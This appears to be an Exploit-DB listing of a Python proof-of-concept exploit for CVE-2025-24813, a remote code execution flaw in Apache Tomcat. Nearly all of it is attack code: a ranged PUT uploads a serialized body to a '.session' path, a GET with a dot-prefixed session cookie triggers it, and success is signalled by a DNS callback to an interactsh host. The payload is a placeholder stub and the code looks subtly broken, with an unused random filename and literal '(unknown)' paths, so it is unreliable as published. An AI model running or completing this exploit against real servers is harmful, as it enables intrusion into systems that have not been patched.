Apache Tomcat 11.0.3 - Remote Code Execution

EDB-ID:

52134




Platform:

Multiple

Date:

2025-04-07


# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution
# Exploit Author: Al Baradi Joy
# CVE: CVE-2025-24813
# Date: 2025-04-06
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-90.cgi
# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98
# Tested on: Apache Tomcat 10.1.33
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-44, CWE-502
# Reference: https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html

import requests
import random
import string
import sys

def rand_filename(length=6):
    """Return a random lowercase ASCII name of *length* characters.

    Drawn from ``random`` rather than ``secrets``: the value is a throwaway
    label, not a security token, so the non-cryptographic RNG is adequate.
    """
    alphabet = string.ascii_lowercase
    chars = [random.choice(alphabet) for _ in range(length)]
    return "".join(chars)

def generate_payload(interact_url):
    """Return the body the PoC uploads in its PUT request.

    As published this is a stub: *interact_url* is not consulted and the
    return value is a fixed placeholder starting with the Java serialization
    stream header, not an object stream that does anything. The author's note
    ("replace with actual gadget bytes or generator") confirms the PoC does
    not function as written.
    """
    placeholder = '\xac\xed\x00\x05...'
    return placeholder

def exploit(target, interact_url):
    """Issue the two-request sequence this PoC performs against *target*.

    Step one is a PUT with a ``Content-Range`` header to a path ending in
    ``.session``; step two is a GET whose ``JSESSIONID`` cookie value starts
    with ``.`` and names that path. Progress is printed and the function
    returns None; the only success signal the author relies on is an
    out-of-band DNS callback to *interact_url*, which cannot occur with the
    placeholder body ``generate_payload`` returns.

    Nothing here checks that the server is vulnerable: a 201 on the PUT only
    shows the upload was accepted. For defenders, the access-log shape is the
    useful part -- a ranged PUT to ``*.session`` followed shortly by a request
    carrying a dot-prefixed JSESSIONID. The file header lists the fixed
    releases as 11.0.3 / 10.1.35 / 9.0.98.
    """
    # Computed but not referenced afterwards (kept for behavioural parity).
    filename = rand_filename()

    upload_url = f"{target}/(unknown).session"
    trigger_url = f"{target}/(unknown)"
    put_headers = {
        "Content-Range": "bytes 0-452/457",
        "Content-Type": "application/octet-stream",
    }
    body = generate_payload(interact_url)

    for line in (
        "[+] Exploit for CVE-2025-24813",
        "[+] Made By Al Baradi Joy\n",
        f"[+] Uploading payload to: {upload_url}",
    ):
        print(line)

    upload = requests.put(upload_url, data=body, headers=put_headers)
    if upload.status_code != 201:
        print(f"[-] Upload failed with status: {upload.status_code}")
        return
    print("[+] Payload uploaded successfully.")

    print(f"[+] Triggering payload via: {trigger_url}")
    session_cookie = {"JSESSIONID": ".(unknown)"}
    # The response is never inspected; the author expects the DNS callback
    # to be the evidence instead.
    requests.get(trigger_url, cookies=session_cookie)
    print(f"[+] Trigger request sent. Check for DNS callback to: {interact_url}")

if __name__ == "__main__":
    # Banner; exploit() prints the same two lines again before it uploads.
    for line in ("[+] Exploit for CVE-2025-24813", "[+] Made By Al Baradi Joy\n"):
        print(line)

    # Both inputs are taken verbatim from the console; nothing validates or
    # normalises them before they are used to build URLs.
    prompts = (
        "Enter the target domain (e.g., http://localhost:8080): ",
        "Enter your interactsh URL: ",
    )
    target_url, interact_url = [input(prompt) for prompt in prompts]

    exploit(target_url, interact_url)